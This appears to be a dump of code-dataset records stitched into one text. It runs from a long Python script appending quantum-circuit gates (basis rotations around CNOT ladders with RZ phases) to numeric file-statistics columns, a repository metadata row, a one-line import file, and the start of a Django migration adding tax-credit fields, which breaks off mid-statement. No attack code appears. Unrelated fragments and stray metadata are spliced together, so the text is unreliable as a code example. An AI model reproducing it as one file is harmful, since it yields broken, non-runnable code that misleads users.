sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.632131, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(6, 3))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.82111, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(3.619499, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
# Eight basis-rotation variants (H/Y combinations on qubits 7, 6, 2, 2)
# conjugating the same CX-ladder + RZ(1.732299, 2) core. The loop replays
# the original unrolled gate sequence in identical order.
_ladder = ((7, 6), (6, 4), (4, 3), (3, 2))
for _ga, _gb, _gc, _gd in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    _basis = ((_ga, 7), (_gb, 6), (_gc, 2), (_gd, 2))
    for _name, _q in _basis:                 # enter rotated basis
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:                   # parity ladder toward target
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(1.732299, 2))          # phase rotation on target qubit
    for _c, _t in reversed(_ladder):         # uncompute ladder
        sim.append(sim.CX(_c, _t))
    for _name, _q in _basis:                 # leave rotated basis
        sim.append(getattr(sim, _name)(_q))
# Eight basis-rotation variants (H/Y combinations on qubits 7, 6, 3, 3)
# around the shared CX-ladder + RZ(0.3668855, 3) core; identical append
# order to the original unrolled block.
_ladder = ((7, 6), (6, 4), (4, 3))
for _ga, _gb, _gc, _gd in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    _basis = ((_ga, 7), (_gb, 6), (_gc, 3), (_gd, 3))
    for _name, _q in _basis:                 # enter rotated basis
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:                   # parity ladder toward target
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(0.3668855, 3))         # phase rotation on target qubit
    for _c, _t in reversed(_ladder):         # uncompute ladder
        sim.append(sim.CX(_c, _t))
    for _name, _q in _basis:                 # leave rotated basis
        sim.append(getattr(sim, _name)(_q))
# Eight basis-rotation variants (H/Y combinations on qubits 7, 6, 0, 0)
# around the full 7→0 CX-ladder + RZ(4.179376, 0) core; identical append
# order to the original unrolled block.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1), (1, 0))
for _ga, _gb, _gc, _gd in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    _basis = ((_ga, 7), (_gb, 6), (_gc, 0), (_gd, 0))
    for _name, _q in _basis:                 # enter rotated basis
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:                   # parity ladder toward target
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(4.179376, 0))          # phase rotation on target qubit
    for _c, _t in reversed(_ladder):         # uncompute ladder
        sim.append(sim.CX(_c, _t))
    for _name, _q in _basis:                 # leave rotated basis
        sim.append(getattr(sim, _name)(_q))
# Eight basis-rotation variants (H/Y combinations on qubits 7, 6, 1, 1)
# around the 7→1 CX-ladder + RZ(5.087414, 1) core; identical append order
# to the original unrolled block.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2), (2, 1))
for _ga, _gb, _gc, _gd in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    _basis = ((_ga, 7), (_gb, 6), (_gc, 1), (_gd, 1))
    for _name, _q in _basis:                 # enter rotated basis
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:                   # parity ladder toward target
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.087414, 1))          # phase rotation on target qubit
    for _c, _t in reversed(_ladder):         # uncompute ladder
        sim.append(sim.CX(_c, _t))
    for _name, _q in _basis:                 # leave rotated basis
        sim.append(getattr(sim, _name)(_q))
# Eight basis-rotation variants (H/Y combinations on qubits 7, 6, 2, 2)
# around the 7→2 CX-ladder + RZ(6.281917, 2) core; identical append order
# to the original unrolled block.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3), (3, 2))
for _ga, _gb, _gc, _gd in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    _basis = ((_ga, 7), (_gb, 6), (_gc, 2), (_gd, 2))
    for _name, _q in _basis:                 # enter rotated basis
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:                   # parity ladder toward target
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(6.281917, 2))          # phase rotation on target qubit
    for _c, _t in reversed(_ladder):         # uncompute ladder
        sim.append(sim.CX(_c, _t))
    for _name, _q in _basis:                 # leave rotated basis
        sim.append(getattr(sim, _name)(_q))
# Eight basis-rotation variants (H/Y combinations on qubits 7, 6, 3, 3)
# around the 7→3 CX-ladder + RZ(5.860174, 3) core; identical append order
# to the original unrolled block.
_ladder = ((7, 6), (6, 5), (5, 4), (4, 3))
for _ga, _gb, _gc, _gd in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    _basis = ((_ga, 7), (_gb, 6), (_gc, 3), (_gd, 3))
    for _name, _q in _basis:                 # enter rotated basis
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:                   # parity ladder toward target
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(5.860174, 3))          # phase rotation on target qubit
    for _c, _t in reversed(_ladder):         # uncompute ladder
        sim.append(sim.CX(_c, _t))
    for _name, _q in _basis:                 # leave rotated basis
        sim.append(getattr(sim, _name)(_q))
# Eight basis-rotation variants (H/Y combinations on qubits 7, 6, 4, 4)
# around the 7→4 CX-ladder + RZ(2.255147, 4) core; identical append order
# to the original unrolled block.
_ladder = ((7, 6), (6, 5), (5, 4))
for _ga, _gb, _gc, _gd in (
    ("H", "H", "H", "H"),
    ("Y", "Y", "Y", "Y"),
    ("H", "Y", "H", "Y"),
    ("Y", "H", "Y", "H"),
    ("Y", "Y", "H", "H"),
    ("H", "H", "Y", "Y"),
    ("Y", "H", "H", "Y"),
    ("H", "Y", "Y", "H"),
):
    _basis = ((_ga, 7), (_gb, 6), (_gc, 4), (_gd, 4))
    for _name, _q in _basis:                 # enter rotated basis
        sim.append(getattr(sim, _name)(_q))
    for _c, _t in _ladder:                   # parity ladder toward target
        sim.append(sim.CX(_c, _t))
    sim.append(sim.RZ(2.255147, 4))          # phase rotation on target qubit
    for _c, _t in reversed(_ladder):         # uncompute ladder
        sim.append(sim.CX(_c, _t))
    for _name, _q in _basis:                 # leave rotated basis
        sim.append(getattr(sim, _name)(_q))
# Pairwise conjugated phase rotations: for each (_top, _tgt, _theta) a
# consecutive CX ladder _top→_tgt surrounds RZ(_theta, _tgt), and the whole
# core is run twice — once in the H basis and once in the Y basis on both
# endpoint qubits. The nested loops replay the exact original gate order.
for _top, _tgt, _theta in (
    (1, 0, 1.072369),
    (2, 0, 1.769972),
    (2, 1, 4.363377),
    (3, 0, 0.4094162),
    (3, 1, 3.037717),
    (3, 2, 1.949632),
    (4, 0, 3.725793),
    (4, 1, 3.286858),
    (4, 2, 3.531732),
    (4, 3, 0.2812523),
    (5, 0, 1.586907),
    (5, 1, 0.1029809),
    (5, 2, 0.3621992),
    (5, 3, 1.144365),
    (5, 4, 4.962369),
    (6, 0, 1.072176),
    (6, 1, 5.936195),
    (6, 2, 4.511295),
    (6, 3, 3.864273),
    (6, 4, 3.494444),
    (6, 5, 5.171286),
    (7, 0, 3.792309),
):
    for _gate_name in ("H", "Y"):
        _rot = getattr(sim, _gate_name)
        sim.append(_rot(_top))               # enter rotated basis
        sim.append(_rot(_tgt))
        for _c in range(_top, _tgt, -1):     # ladder down to target
            sim.append(sim.CX(_c, _c - 1))
        sim.append(sim.RZ(_theta, _tgt))     # phase rotation on target
        for _c in range(_tgt + 1, _top + 1): # uncompute ladder
            sim.append(sim.CX(_c, _c - 1))
        sim.append(_rot(_top))               # leave rotated basis
        sim.append(_rot(_tgt))
sim.append(sim.H(7))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.439179, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.439179, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.7732, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.7732, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(2.95733, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(2.95733, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(1.482614, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(1.482614, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.RZ(4.528935, 5))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.RZ(4.528935, 5))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.CX(7, 6))
sim.append(sim.RZ(3.161797, 6))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.CX(7, 6))
sim.append(sim.RZ(3.161797, 6))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.upload()
sim.run()
sim.measure(10)
| 23.650157
| 58
| 0.654031
| 60,801
| 255,942
| 2.753063
| 0.00222
| 0.581113
| 0.774818
| 0.459003
| 0.999098
| 0.999098
| 0.999098
| 0.999098
| 0.999098
| 0.999098
| 0
| 0.086321
| 0.066187
| 255,942
| 10,821
| 59
| 23.652343
| 0.614045
| 0
| 0
| 0.999168
| 0
| 0
| 0.000133
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.000185
| 0
| 0.000185
| 0.000092
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e6f6bef0631a537e0176e1e5413d2b7abb4f9377
| 68
|
py
|
Python
|
strategies/blueprints/two_assets_MA/__init__.py
|
fredmanre/dockerizer
|
9d481bfef0199578ad5e0f19e9596e3aeec3c18d
|
[
"MIT"
] | 1
|
2020-10-19T04:12:21.000Z
|
2020-10-19T04:12:21.000Z
|
strategies/blueprints/two_assets_MA/__init__.py
|
fredmanre/dockerizer
|
9d481bfef0199578ad5e0f19e9596e3aeec3c18d
|
[
"MIT"
] | null | null | null |
strategies/blueprints/two_assets_MA/__init__.py
|
fredmanre/dockerizer
|
9d481bfef0199578ad5e0f19e9596e3aeec3c18d
|
[
"MIT"
] | null | null | null |
from strategies.blueprints.two_assets_MA.views import two_assets_MA
| 34
| 67
| 0.897059
| 11
| 68
| 5.181818
| 0.727273
| 0.315789
| 0.385965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 68
| 1
| 68
| 68
| 0.890625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
fc38a4f8532909ed5dc40a610970154a4a6d200a
| 7,610
|
py
|
Python
|
webapp/apps/taxbrain/migrations/0056_auto_20171120_2123.py
|
OpenSourcePolicyCenter/PolicyBrain
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 13
|
2017-11-07T15:54:42.000Z
|
2018-09-27T20:56:28.000Z
|
webapp/apps/taxbrain/migrations/0056_auto_20171120_2123.py
|
OpenSourcePolicyCenter/webapp-public
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 547
|
2015-08-07T21:32:51.000Z
|
2017-09-14T21:25:43.000Z
|
webapp/apps/taxbrain/migrations/0056_auto_20171120_2123.py
|
OpenSourcePolicyCenter/webapp-public
|
5edffcd5cf8bb6544afc1ed982636abe66e246e1
|
[
"MIT"
] | 23
|
2015-08-07T20:55:39.000Z
|
2017-08-25T19:20:20.000Z
|
# -*- coding: utf-8 -*-
from django.db import models, migrations
import webapp.apps.taxbrain.models
class Migration(migrations.Migration):
dependencies = [
('taxbrain', '0055_remove_taxsaveinputs_reform_style'),
]
operations = [
migrations.AddField(
model_name='taxsaveinputs',
name='CTC_new_for_all',
field=models.CharField(default=b'False', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='DependentCredit_Child_c',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='DependentCredit_Nonchild_c',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='DependentCredit_before_CTC',
field=models.CharField(default=b'False', max_length=50, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_0',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_1',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_2',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_3',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
model_name='taxsaveinputs',
name='FilerCredit_c_4',
field=webapp.apps.taxbrain.models.CommaSeparatedField(default=None, max_length=200, null=True, blank=True),
),
migrations.AddField(
